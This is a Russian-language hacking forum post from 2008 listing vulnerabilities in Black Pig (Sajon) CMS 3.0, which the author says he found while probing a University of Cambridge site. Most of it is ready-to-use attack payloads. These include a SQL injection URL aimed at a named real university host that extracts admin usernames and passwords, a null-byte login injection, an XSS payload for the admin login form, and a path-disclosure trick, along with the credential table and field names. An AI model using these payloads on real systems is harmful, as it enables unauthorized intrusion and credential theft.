Тема: Уязвимости Sajon CMS 3.0
Показать сообщение отдельно

Уязвимости Black Pig (Sajon) CMS 3.0
  #1  
Старый 26.12.2008, 22:08
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию Уязвимости Black Pig (Sajon) CMS 3.0
Наткнулса исследуя Университет Кембриджа:
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.

Sql-inj

1. Имя файла может меняться, но уязвим параметр key
PHP код:
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+FROM+cmscamenter.cms_users-- 
2. Скуля в админке, при авторизации
PHP код:
POST
formloginuser=%00
XSS

PHP код:
http://www.site.com/cms/admin.php
POST
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>
Тоже самое в goid,gopage 
Админка:
PHP код:
site.com/cms
Раскрытие пути

PHP код:
http://www.site.com/cms/admin.php
в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ 
PHP код:
Tablecms_users
Fieldsusername,password 
Author: The Black Pig Design Co Ltd
www.blackpig.co.uk

Сорцов нет;аплоад,судя по логам-есть, но я ненашел.
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось $n@ke; 26.12.2008 в 23:51.. Причина: да хрен его знает как называеться CMS =)
 
Ответить с цитированием